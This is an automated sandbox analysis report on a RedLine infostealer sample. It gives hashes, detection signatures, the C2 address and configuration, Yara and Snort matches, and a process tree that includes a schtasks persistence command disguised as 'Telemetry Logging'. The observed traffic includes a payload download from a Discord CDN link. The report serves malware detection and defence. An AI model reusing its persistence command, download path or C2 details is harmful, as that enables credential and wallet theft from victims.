Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:746784
MD5:d8fa5ec2e689dfbc2559ef3a5cb69ca2
SHA1:c21dd2d112d69f52318dbef8bdeea892e09c7d19
SHA256:9aecf1abe46d70a02d17800dbe3a8bda2f72f87456abb0dda69c7f7920cddb60
Tags:exe
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to steal Crypto Currency Wallets
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 1352 cmdline: C:\Users\user\Desktop\file.exe MD5: D8FA5EC2E689DFBC2559EF3A5CB69CA2)
    • Setup.exe (PID: 3312 cmdline: "C:\Users\user\AppData\Local\Temp\Setup.exe" MD5: BCBB46256A4AF7B5509B2924BE449BC3)
      • schtasks.exe (PID: 2184 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • oobeldr.exe (PID: 4304 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe MD5: BCBB46256A4AF7B5509B2924BE449BC3)
    • schtasks.exe (PID: 2944 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 url": ["37.139.128.203:44588"], "Bot Id": "all", "Authorization Header": "32aa4d6df6f06883d86b201db44480e4"}
SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    file.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x21024:$pat14: , CommandLine:
    • 0x18d5e:$v2_1: ListOfProcesses
    • 0x18af2:$v4_3: base64str
    • 0x19b7d:$v4_4: stringKey
    • 0x16708:$v4_5: BytesToStringConverted
    • 0x15770:$v4_6: FromBase64
    • 0x16edc:$v4_8: procName
    • 0x1725f:$v5_1: DownloadAndExecuteUpdate
    • 0x18a02:$v5_2: ITaskProcessor
    • 0x1724d:$v5_3: CommandLineUpdate
    • 0x1723e:$v5_4: DownloadUpdate
    • 0x178f6:$v5_5: FileScanning
    • 0x16a77:$v5_7: RecordHeaderField
    • 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000006.00000002.575451652.0000000000201000.00000020.00000001.01000000.00000007.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
      • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
      00000001.00000003.426846132.00000000001A0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
      • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
      00000001.00000002.440712189.00000000013E1000.00000020.00000001.01000000.00000006.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
      • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
      00000000.00000000.309008027.0000000000E22000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000006.00000003.468605654.0000000001270000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
        • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        0.0.file.exe.e20000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0.0.file.exe.e20000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x21024:$pat14: , CommandLine:
          • 0x18d5e:$v2_1: ListOfProcesses
          • 0x18af2:$v4_3: base64str
          • 0x19b7d:$v4_4: stringKey
          • 0x16708:$v4_5: BytesToStringConverted
          • 0x15770:$v4_6: FromBase64
          • 0x16edc:$v4_8: procName
          • 0x1725f:$v5_1: DownloadAndExecuteUpdate
          • 0x18a02:$v5_2: ITaskProcessor
          • 0x1724d:$v5_3: CommandLineUpdate
          • 0x1723e:$v5_4: DownloadUpdate
          • 0x178f6:$v5_5: FileScanning
          • 0x16a77:$v5_7: RecordHeaderField
          • 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
          1.2.Setup.exe.13e0000.0.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
          • 0x8c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
          6.2.oobeldr.exe.200000.0.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
          • 0x8c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
          No Sigma rule has matched
          Timestamp:37.139.128.203192.168.2.544588497062850353 11/15/22-18:54:18.080513
          SID:2850353
          Source Port:44588
          Destination Port:49706
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.537.139.128.20349706445882850286 11/15/22-18:54:42.350080
          SID:2850286
          Source Port:49706
          Destination Port:44588
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.537.139.128.20349706445882850027 11/15/22-18:54:16.253696
          SID:2850027
          Source Port:49706
          Destination Port:44588
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: file.exeReversingLabs: Detection: 75%
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeReversingLabs: Detection: 61%
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeReversingLabs: Detection: 61%
          Source: file.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\Setup.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeJoe Sandbox ML: detected
          Source: 1.2.Setup.exe.13e0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 1.0.Setup.exe.13e0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 6.0.oobeldr.exe.200000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: 6.2.oobeldr.exe.200000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: file.exeMalware Configuration Extractor: RedLine {"C2 url": ["37.139.128.203:44588"], "Bot Id": "all", "Authorization Header": "32aa4d6df6f06883d86b201db44480e4"}
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

          barindex
          Source: TrafficSnort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49706 -> 37.139.128.203:44588
          Source: TrafficSnort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49706 -> 37.139.128.203:44588
          Source: TrafficSnort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 37.139.128.203:44588 -> 192.168.2.5:49706
          Source: Malware configuration extractorURLs: 37.139.128.203:44588
          Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /attachments/1013922792204415100/1029136565533933638/Setup.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
          Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
          Source: global trafficTCP traffic: 192.168.2.5:49706 -> 37.139.128.203:44588
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.203
          Source: file.exe, 00000000.00000002.416117192.0000000003433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
          Source: file.exe, 00000000.00000002.416227735.000000000344F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416247086.0000000003453000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416272866.0000000003466000.00000004.00000800.00020000.00000000.sdmp, Setup.exe.0.dr, oobeldr.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
          Source: file.exe, 00000000.00000002.416227735.000000000344F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416247086.0000000003453000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416272866.0000000003466000.00000004.00000800.00020000.00000000.sdmp, Setup.exe.0.dr, oobeldr.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
          Source: file.exe, 00000000.00000002.416227735.000000000344F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416247086.0000000003453000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416272866.0000000003466000.00000004.00000800.00020000.00000000.sdmp, Setup.exe.0.dr, oobeldr.exe.1.drString found in binary or memory: http://ocsp.sectigo.com0
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
          Source: file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
          Source: file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
